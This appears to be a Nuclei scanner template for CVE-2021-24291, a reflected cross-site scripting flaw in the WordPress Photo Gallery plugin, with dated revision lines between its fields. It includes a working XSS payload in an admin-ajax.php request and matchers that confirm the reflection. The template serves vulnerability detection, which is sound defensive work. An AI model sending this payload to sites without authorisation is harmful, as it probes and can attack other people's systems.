2021-07-26 17:18:45 +00:00
id : CVE-2021-24291
info :
name : Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
author : geeknik
severity : medium
2022-05-17 09:18:12 +00:00
description : The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
2022-04-22 10:38:41 +00:00
reference :
- https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
2022-05-17 09:18:12 +00:00
- https://packetstormsecurity.com/files/162227/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-24291
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,xss,wordpress,wp-plugin,photo
2021-07-26 17:18:45 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//'
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : header
words :
- "text/html"
- type : word
words :
- "onmouseover=alert(document.domain)//"
- "wp-content/uploads/photo-gallery"
condition : and